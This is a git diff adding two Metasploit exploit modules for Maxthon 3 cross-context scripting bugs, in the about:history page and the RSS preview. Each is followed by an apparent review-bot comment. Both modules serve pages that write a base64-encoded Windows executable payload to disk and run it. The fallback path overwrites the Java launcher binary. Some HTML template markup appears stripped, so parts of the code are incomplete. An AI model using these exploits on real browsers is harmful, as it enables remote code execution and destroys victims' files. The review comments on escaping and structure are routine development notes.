diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb new file mode 100644 index 0000000000..6bd52de532 --- /dev/null +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -0,0 +1,167 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Maxthon about:history XCS', + 'Description' => %q{ + Cross Context Scripting (XCS) is possible in the Maxthon about:history page. + Injection in such privileged/trusted browser zone can be used to modify configuration settings and + execute arbitrary commands. Affects Maxthon 3 browsers. + }, + 'License' => BSD_LICENSE, + 'Author' => + [ 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + ['CVE', 'TBA'], + ['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-about-history-rce.html'], + ], + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => + [ + ['Maxthon 3', + { + 'Platform' => 'win', + } + ], + ], + 'DisclosureDate' => 'Nov 26 2012', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']), + OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']), + ], self.class + + ) + end + + def on_request_uri(cli, request) + + jpath = datastore['JPATH'] + javaurl = datastore['JAVAURL'] + + headers = {} + html_hdr = %Q^ + + + Loading + ^ + html_ftr = %Q^ + + +

Loading

+ + ^ + + case request.uri + when /[?]jspayload/ + p = regenerate_payload(cli) + if (p.nil?) + send_not_found(cli) + return + end + # We're going to run this through unescape(), so make sure + # everything is encoded + penc = Msf::Util::EXE.to_win32pe(framework, p.encoded) + penc2 = Rex::Text.encode_base64(penc) + # now this is base64 encoded payload which needs to be passed to the file write api in maxthon + # depending on maxthon version, then file can be launched via Program DOM API + # or replacing Java program + content = + %Q{ + var fileTemp = new maxthon.io.File.createTempFile("test","exe"); + var fileObj = maxthon.io.File(fileTemp); + maxthon.io.FileWriter(fileTemp); + + + if(maxthon.program) + { + maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}"); + maxthon.program.Program.launch(fileTemp.name_,"C:"); + } + + else + { + // here we need to take a dirty approach, we need to overwrite an existing exe and then invoke it + // this is because the maxthon.program object has been silently removed in latest Maxthon versions... + // in WindowsXP, any exe can be overwritten, then a simple call to a uri scheme can invoke the exe + // e.g. 
wab.exe invoked via mailto:// + // however, in win7, a prompt will be displayed if browser executes a mail client or an external program + // so a common way to exploit would be to overwrite the j2plauncher.exe, which calls java.exe when applet is found + // once that is done, then we can point to a page where a java applet exists which will invoke java.exe, + // unless previously loaded by the user + // + fileTemp.name_ = "#{jpath}"; + maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}"); + + a=document.createElement("iframe"); + a.setAttribute("src","#{javaurl}"); + document.body.appendChild(a) + + } + + } + + when /[?]history/ + js = %Q^ + window.onload = function() { + location.href = "about:history"; + } + ^ + content = %Q^ + #{html_hdr} + + #{html_ftr} + ^ + when get_resource() + print_status("Sending #{self.name} payload for request #{request.uri}") + + js = %Q^ + + url = location.href; + url2 = url + "?jspayload=1"; + + inj = "?history#%22/> + #{js} + + #{html_ftr} + ^ + else + print_status("Sending 404 for request #{request.uri}") + send_not_found(cli) + return + end + + send_response_html(cli, content, headers) + handler(cli) + end + +end diff --git a/modules/exploits/windows/browser/maxthon_rss_xcs.rb b/modules/exploits/windows/browser/maxthon_rss_xcs.rb new file mode 100644 index 0000000000..a5133482eb --- /dev/null +++ b/modules/exploits/windows/browser/maxthon_rss_xcs.rb 
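Review bot: The datastore values are spliced verbatim into JavaScript string literals in the `?jspayload` branch (`fileTemp.name_ = "#{jpath}";` and `a.setAttribute("src","#{javaurl}")`), so a JPATH or JAVAURL containing a double quote or a single backslash breaks or alters the generated script; the default JPATH only works because it is pre-escaped with doubled backslashes. Either escape at the point of use and give JPATH a plain Windows path as its default, or at least make the contract explicit in the option description, e.g. `OptString.new('JPATH', [true, "Java executable path to overwrite (written verbatim into a JavaScript string literal, so backslashes must be doubled)", ...])`. The comment `# We're going to run this through unescape(), so make sure everything is encoded` is stale, since nothing in the branch calls unescape(); the payload is base64-encoded for `writeDataURL`, and the comment should say so. Overwriting the file at JPATH is destructive and the module keeps no copy to restore, which deserves a `print_warning` when the `else` path is the one that will run.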
@@ -0,0 +1,114 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Maxthon RSS Preview', + 'Description' => %q{ + RSS feed content is rendered by Maxthon in a trusted/privileged zone. + Injection in such privileged/trusted browser zone can be used to modify configuration settings and execute arbitrary commands. + Affects Maxthon 3 browsers. + }, + 'License' => BSD_LICENSE, + 'Author' => + [ + 'Roberto Suggi Liverani', # Discovered the vulnerability and developed msf module + ], + 'Version' => '$Revision: 1 $', + 'References' => + [ + ['CVE', 'TBA'], + ['URL', 'http://blog.malerisch.net/2012/11/maxthon-cross-context-scripting-xcs-rss-rce.html'], + ], + 'Payload' => + { + 'DisableNops' => true, + }, + 'Targets' => + [ + ['Maxthon 3', + { + 'Platform' => 'win', + } + ], + ], + + 'DisclosureDate' => 'Nov 26 2012', + + 'DefaultTarget' => 0 + + )) + + register_options( + [ + OptString.new('JPATH', [true, "Java executable path to overwrite", 'C:\\\\Program\\ Files\\\\Java\\\\jre7\\\\bin\\\\jp2launcher.exe']), + OptString.new('JAVAURL', [true, "Java Applet URL", 'http://profs.etsmtl.ca/mmcguffin/learn/java/01-drawingLines/']), + ], self.class + + ) + + + end + + def on_request_uri(cli, request) + + jpath = datastore['JPATH'] + javaurl = datastore['JAVAURL'] + + headers = {} + html_hdr = %Q^ + + + Loading + ^ + html_ftr = %Q^ + + +

Loading

+ + ^ + + case request.uri + + when get_resource() + print_status("Sending #{self.name} payload for request #{request.uri}") + p = regenerate_payload(cli) + if (p.nil?) + send_not_found(cli) + return + end + penc = Msf::Util::EXE.to_win32pe(framework, p.encoded) + penc2 = Rex::Text.encode_base64(penc) + + js = %Q|var fileTemp=new maxthon.io.File.createTempFile("test","exe");var fileObj=maxthon.io.File(fileTemp);maxthon.io.FileWriter(fileTemp);if(maxthon.program){maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");maxthon.program.Program.launch(fileTemp.name_,"C:"); } else {fileTemp.name_ = "#{jpath}"; maxthon.io.writeDataURL("data:application/x-msdownload;base64,#{penc2}");a=document.createElement("iframe");a.setAttribute("src","#{javaurl}");document.body.appendChild(a)}| + + + content = %Q| + + + Malerisch.net + http://blog.malerisch.net/ + Malerisch.net + + test + javascript:alert(window.location); + 07/09/2008 - test <img src=a onerror='#{js}'> + Sun, 07 Sep 2008 12:00:00 GMT + + + | + else + print_status("Sending 404 for request #{request.uri}") + send_not_found(cli) + return + end + + send_response_html(cli, content, headers) + handler(cli) + end + +end
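Review bot: The feed is returned through `send_response_html` with `headers` left empty, so the body is labelled text/html rather than an RSS/XML media type; whether Maxthon's RSS preview is selected by Content-Type or by sniffing the body is not visible here, so confirm it, and if the type matters set `headers['Content-Type'] = 'application/rss+xml'` and send with `send_response(cli, content, headers)`. The option definitions and the temp-file/`writeDataURL`/launcher-overwrite JavaScript are duplicated from maxthon_history_xcs.rb in this same commit; a small shared mixin would keep the two modules from drifting apart. As in the sibling module, `#{jpath}` and `#{javaurl}` are inserted unescaped into JavaScript literals, here additionally inside a single-quoted `onerror='...'` attribute, so a value containing `'` or `"` breaks the injection; the JPATH description should state that the value is written verbatim as a JavaScript string with backslashes doubled.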